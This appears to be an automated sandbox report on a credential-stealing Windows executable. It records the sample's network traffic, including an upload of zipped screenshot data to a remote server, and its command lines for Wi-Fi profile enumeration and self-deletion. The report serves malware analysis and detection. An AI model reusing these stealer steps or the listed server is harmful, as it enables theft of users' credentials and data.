                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x95B6C1D8 [Thu Aug 5 13:19:20 2049 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      push ecx
                                      hlt
                                      cmpsd
                                      push eax
                                      jle 00007FBD8031C623h
                                      push ebx
                                      sbb dl, byte ptr [edi]
                                      movsb
                                      ret
                                      cmp ah, byte ptr [edi]
                                      pop esi
                                      xchg eax, esi
                                      cmp ebp, dword ptr [ebx-62E03495h]
                                      inc ebp
                                      int1
                                      lodsb
                                      cli
                                      pop eax
                                      stosd
                                      dec ebx
                                      jecxz 00007FBD8031C5E5h
                                      xchg eax, ebx
                                      and byte ptr [eax], dh
                                      cli
                                      push ebp
                                      lodsd
                                      jbe 00007FBD8031C64Fh
                                      test byte ptr [eax-0A6E8934h], 00000002h
                                      dec esp
                                      and eax, FCD7E54Fh
                                      lds ebp, fword ptr [edx]
                                      retf
                                      xlatb
                                      xor eax, 62B58044h
                                      mov dword ptr [5AB1DE8Fh], eax
                                      dec ecx
                                      and eax, 45671BBAh
                                      jmp far E1C0h : FE5D980Eh
                                      ret
                                      das
                                      jne 00007FBD8031C5E4h
                                      or dword ptr [eax+esi*8+12h], A397468Dh
                                      imul edx, ebx, F9h
                                      mov byte ptr [ebx], FFFFFF8Fh
                                      pop edi
                                      out 15h, eax
                                      xchg eax, edx
                                      pushfd
                                      xchg eax, ebp
                                      mov edi, 95EB7A6Dh
                                      push edx
                                      pop ecx
                                      fcmovbe st(0), st(4)
                                      mov esi, 74582D83h
                                      and ebx, edx
                                      dec ecx
                                      loopne 00007FBD8031C64Bh
                                      sub dword ptr [esi+7544C8C9h], ecx
                                      retn 6A89h
                                      hlt
                                      mov seg?, word ptr [ecx+78h]
                                      cdq
                                      pop eax
                                      imul esp, dword ptr [edi], B9h
                                      jno 00007FBD8031C5BFh
                                      mov esi, F0B64FE1h
                                      mov byte ptr [ebp-53DF36E9h], ch
                                      jnl 0000C5B1h
                                      cmp dh, byte ptr [ebx-1AE7B521h]
                                      sbb dh, byte ptr [ecx]
                                      adc byte ptr [edi+62603351h], 00000053h
                                      jnle 00007FBD8031C627h
                                      mov cl, 64h
                                      jnbe 00007FBD8031C5C2h
                                      mov ebx, FE84AE6Bh
                                      and dword ptr [eax+2B08F91Ch], 00487094h

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2ab980x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x150c.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2aaf80x38.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0xd1e100x48.T]1
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x296500x2980045818c67f56ddb02ae660ca1531655e1False0.8692465173192772data7.867046875219915IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .Nw 0x2c0000x7e3a30x7e4009f2b273f4e701b8e812b9119c207d826False0.7242206837871287COM executable for DOS7.056379099711291IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .T]10xac0000x4bc600x4be00329cdf805bc6350fb921e8b6b1420765False0.5974567545304778data6.844845731566418IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xf80000x150c0x1600a24c95a0275f3452dc966cdb7b2f254dFalse0.3913352272727273data5.414192396678741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xfa0000xc0x200d8943c7532d69bb209b7dec76f20f919False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0xf80900x340data0.45072115384615385
                                      RT_MANIFEST0xf83e00x1126XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.40387243735763095

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-04T14:54:04.616127+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.204971289.23.100.2331489TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 4, 2024 14:53:57.331523895 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:53:57.457797050 CET8049711104.16.185.241192.168.11.20
                                      Dec 4, 2024 14:53:57.458364010 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:53:57.458498955 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:53:57.584839106 CET8049711104.16.185.241192.168.11.20
                                      Dec 4, 2024 14:53:57.594958067 CET8049711104.16.185.241192.168.11.20
                                      Dec 4, 2024 14:53:57.648850918 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:54:03.557393074 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:03.819410086 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:03.819694042 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:03.820700884 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:03.821542978 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:54:03.948170900 CET8049711104.16.185.241192.168.11.20
                                      Dec 4, 2024 14:54:03.948344946 CET4971180192.168.11.20104.16.185.241
                                      Dec 4, 2024 14:54:04.088846922 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.090517998 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.091257095 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.091305971 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.091381073 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.091545105 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.352282047 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353142023 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353374004 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.353389978 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353415012 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353432894 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353665113 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.353672981 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.353723049 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.353765011 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.353964090 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.354130030 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.615093946 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.615318060 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.615485907 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.615562916 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.615818024 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.615901947 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616065979 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.616070986 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616091967 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.616127014 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616300106 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.616327047 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616492033 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616662979 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.616835117 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.617001057 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.877351999 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.877376080 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.877574921 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.877743959 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.877876043 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.877986908 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.878154993 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.878308058 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.878324986 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.878338099 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.878561020 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.878582001 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.878753901 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.878997087 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:04.880676031 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:04.880991936 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.140228033 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.140258074 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.140278101 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.140712976 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.140760899 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.141120911 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:05.141165018 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:06.767086983 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:06.782032013 CET14894971289.23.100.233192.168.11.20
                                      Dec 4, 2024 14:54:06.782259941 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:06.782371044 CET497121489192.168.11.2089.23.100.233
                                      Dec 4, 2024 14:54:07.044311047 CET14894971289.23.100.233192.168.11.20

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 4, 2024 14:53:57.177542925 CET6366453192.168.11.201.1.1.1
                                      Dec 4, 2024 14:53:57.305327892 CET53636641.1.1.1192.168.11.20
                                      Dec 4, 2024 14:53:57.617691040 CET5707353192.168.11.201.1.1.1
                                      Dec 4, 2024 14:53:57.745100021 CET53570731.1.1.1192.168.11.20

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 4, 2024 14:53:57.177542925 CET192.168.11.201.1.1.10x7824Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                      Dec 4, 2024 14:53:57.617691040 CET192.168.11.201.1.1.10x6a04Standard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 4, 2024 14:53:57.305327892 CET1.1.1.1192.168.11.200x7824No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                      Dec 4, 2024 14:53:57.305327892 CET1.1.1.1192.168.11.200x7824No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                      Dec 4, 2024 14:53:57.745100021 CET1.1.1.1192.168.11.200x6a04Name error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • icanhazip.com
                                      • 89.23.100.233:1489

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.11.2049711104.16.185.241804236C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 4, 2024 14:53:57.458498955 CET63OUTGET / HTTP/1.1
                                      Host: icanhazip.com
                                      Connection: Keep-Alive
                                      Dec 4, 2024 14:53:57.594958067 CET535INHTTP/1.1 200 OK
                                      Date: Wed, 04 Dec 2024 13:53:57 GMT
                                      Content-Type: text/plain
                                      Content-Length: 13
                                      Connection: keep-alive
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET
                                      Set-Cookie: __cf_bm=kIZcPiyx7c2zMMO396_gYRhaoLoX8N1Te8vuUbRUusk-1733320437-1.0.1.1-B2mqRYfL3.uZ8Npf8AEqFVpQNYujJujN1shS1zQgbXhjpyLK3Y2idvoDNe8UxLKwj2MXZLBMlgifzs8VrsayGg; path=/; expires=Wed, 04-Dec-24 14:23:57 GMT; domain=.icanhazip.com; HttpOnly
                                      Server: cloudflare
                                      CF-RAY: 8ecc491e889e3353-MIA
                                      alt-svc: h3=":443"; ma=86400
                                      Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
                                      Data Ascii: 84.17.40.110


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.11.204971289.23.100.23314894236C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 4, 2024 14:54:03.820700884 CET205OUTPOST /upload HTTP/1.1
                                      Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96"
                                      Host: 89.23.100.233:1489
                                      Content-Length: 132449
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 4, 2024 14:54:04.088846922 CET25INHTTP/1.1 100 Continue
                                      Dec 4, 2024 14:54:04.352282047 CET25INHTTP/1.1 100 Continue
                                      Dec 4, 2024 14:54:06.767086983 CET165INHTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.13.0
                                      Date: Wed, 04 Dec 2024 13:54:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 61
                                      Connection: close


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:08:53:54
                                      Start date:04/12/2024
                                      Path:C:\Users\user\Desktop\3K5MXGVOJE.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\3K5MXGVOJE.exe"
                                      Imagebase:0x770000
                                      File size:1'005'056 bytes
                                      MD5 hash:532E953689741622B91A29F7DB4BCCE0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:08:53:55
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"cmd.exe" /c tasklist
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:08:53:55
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0x4a0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\chcp.com
                                      Wow64 process (32bit):true
                                      Commandline:chcp 65001
                                      Imagebase:0x1000000
                                      File size:12'800 bytes
                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\netsh.exe
                                      Wow64 process (32bit):true
                                      Commandline:netsh wlan show profiles
                                      Imagebase:0x1790000
                                      File size:82'432 bytes
                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:08:53:56
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr All
                                      Imagebase:0x9c0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
                                      Imagebase:0x590000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78dff0000
                                      File size:875'008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\chcp.com
                                      Wow64 process (32bit):true
                                      Commandline:chcp 65001
                                      Imagebase:0x1000000
                                      File size:12'800 bytes
                                      MD5 hash:41146159AA3D41A92B53ED311EE15693
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                      Wow64 process (32bit):true
                                      Commandline:TaskKill /F /IM 4236
                                      Imagebase:0x2b0000
                                      File size:74'240 bytes
                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:Timeout /T 2 /Nobreak
                                      Imagebase:0xb40000
                                      File size:25'088 bytes
                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:08:54:11
                                      Start date:04/12/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
                                      Imagebase:0xd50000
                                      File size:482'640 bytes
                                      MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:30.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:100%
                                        Total number of Nodes:24
                                        Total number of Limit Nodes:0
                                        execution_graph 46759 5184d18 46760 5184d63 NtMapViewOfSection 46759->46760 46762 5184dc5 46760->46762 46763 5184a98 46764 5184ae6 NtOpenFile 46763->46764 46766 5184b30 46764->46766 46767 5184e08 46768 5184e50 NtQueryVolumeInformationFile 46767->46768 46770 5184e8e 46768->46770 46783 5184678 46784 51846c6 NtProtectVirtualMemory 46783->46784 46786 5184710 46784->46786 46771 5184750 46772 518479b NtAllocateVirtualMemory 46771->46772 46774 51847e2 46772->46774 46775 5184ed0 46776 5184f18 NtDeviceIoControlFile 46775->46776 46778 5184f65 46776->46778 46779 51841c0 46780 5184200 NtClose 46779->46780 46782 5184231 46780->46782 46787 5184b70 46788 5184bbe NtCreateSection 46787->46788 46790 5184c0b 46788->46790

                                        Executed Functions

                                        Function 05A08460 Relevance: 15.9, Strings: 9, Instructions: 4648COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 5a08460-5a08489 2 5a08490-5a084b5 0->2 5 5a08762-5a0881e 2->5 6 5a084bb-5a085c0 2->6 5->2 19 5a08824-5a08840 5->19 6->2 20 5a085c6-5a0868b 6->20 21 5a0884a-5a08886 19->21 33 5a0868e-5a0875c 20->33 579 5a08889 call 518c038 21->579 580 5a08889 call 518c01f 21->580 581 5a08889 call 518c280 21->581 24 5a0888e-5a088fb 32 5a08902-5a089a5 24->32 32->20 46 5a089ab-5a08a1d 32->46 33->2 33->5 49 5a08a25-5a08a5e 46->49 597 5a08a61 call 518c038 49->597 598 5a08a61 call 518c01f 49->598 599 5a08a61 call 518c280 49->599 50 5a08a66-5a08aa2 50->33 53 5a08aa8-5a08bb0 50->53 53->20 60 5a08bb6-5a08c7a 53->60 60->2 67 5a08c80-5a08d52 60->67 67->20 74 5a08d58-5a08e3e 67->74 74->2 81 5a08e44-5a08f39 74->81 81->2 88 5a08f3f-5a09068 81->88 95 5a09072-5a090b0 88->95 591 5a090b6 call 518c038 95->591 592 5a090b6 call 518c01f 95->592 593 5a090b6 call 518c280 95->593 96 5a090bb-5a092be 96->2 113 5a092c4-5a093bf 96->113 113->2 120 5a093c5-5a0948b 113->120 120->6 127 5a09491-5a0954f 120->127 127->2 134 5a09555-5a09648 127->134 134->2 141 5a0964e-5a0995a 134->141 141->6 160 5a09960-5a09a55 141->160 160->2 167 5a09a5b-5a09b7d 160->167 167->6 174 5a09b83-5a09e65 167->174 174->6 193 5a09e6b-5a0a03f 174->193 193->2 206 5a0a045-5a0a140 193->206 206->2 213 5a0a146-5a0a204 206->213 213->2 220 5a0a20a-5a0a30e 213->220 220->6 227 5a0a314-5a0a4ab 220->227 227->2 240 5a0a4b1-5a0a5b5 227->240 247 5a0a5bf-5a0a5e4 240->247 594 5a0a5e6 call 518c038 247->594 595 5a0a5e6 call 518c01f 247->595 596 5a0a5e6 call 518c280 247->596 248 5a0a5eb-5a0a684 248->2 253 5a0a68a-5a0a7bd 248->253 262 5a0a7c8-5a0a7eb 253->262 588 5a0a7f1 call 518c038 262->588 589 5a0a7f1 call 518c01f 262->589 590 5a0a7f1 call 518c280 262->590 263 5a0a7f6-5a0a825 263->2 266 5a0a82b-5a0aaee 263->266 266->20 285 5a0aaf4-5a0ac10 266->285 285->20 292 5a0ac16-5a0ac8e 285->292 295 5a0ac99-5a0acd7 292->295 585 5a0acdd call 518c038 295->585 586 5a0acdd call 518c01f 295->586 587 5a0acdd call 518c280 295->587 296 5a0ace2-5a0ad15 296->2 299 5a0ad1b-5a0aded 296->299 299->2 306 5a0adf3-5a0aeee 299->306 306->32 313 5a0aef4-5a0b015 306->313 313->2 320 5a0b01b-5a0b10d 313->320 320->5 327 5a0b113-5a0b3b8 320->327 327->19 346 5a0b3be-5a0b595 327->346 346->2 359 5a0b59b-5a0b680 346->359 359->6 366 5a0b686-5a0b794 359->366 366->2 373 5a0b79a-5a0b860 366->373 373->5 380 5a0b866-5a0b91c 373->380 380->2 387 5a0b922-5a0ba30 380->387 394 5a0ba3a-5a0ba74 387->394 582 5a0ba7a call 518c038 394->582 583 5a0ba7a call 518c01f 394->583 584 5a0ba7a call 518c280 394->584 395 5a0ba7f-5a0baf5 395->2 400 5a0bafb-5a0bbfe 395->400 400->2 407 5a0bc04-5a0bddc 400->407 407->6 420 5a0bde2-5a0c1a2 407->420 420->2 445 5a0c1a8-5a0c2b8 420->445 445->2 452 5a0c2be-5a0c3c9 445->452 452->2 459 5a0c3cf-5a0c972 452->459 459->2 496 5a0c978-5a0ca9b 459->496 505 5a0caa6-5a0cab7 496->505 576 5a0cabd call 518c038 505->576 577 5a0cabd call 518c01f 505->577 578 5a0cabd call 518c280 505->578 506 5a0cac2-5a0caf2 506->2 509 5a0caf8-5a0cbed 506->509 509->6 516 5a0cbf3-5a0ced3 509->516 516->33 535 5a0ced9-5a0cfc9 516->535 535->20 542 5a0cfcf-5a0d085 535->542 542->2 549 5a0d08b-5a0d40d 542->549 549->6 574 5a0d413-5a0d436 549->574 576->506 577->506 578->506 579->24 580->24 581->24 582->395 583->395 584->395 585->296 586->296 587->296 588->263 589->263 590->263 591->96 592->96 593->96 594->248 595->248 596->248 597->50 598->50 599->50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
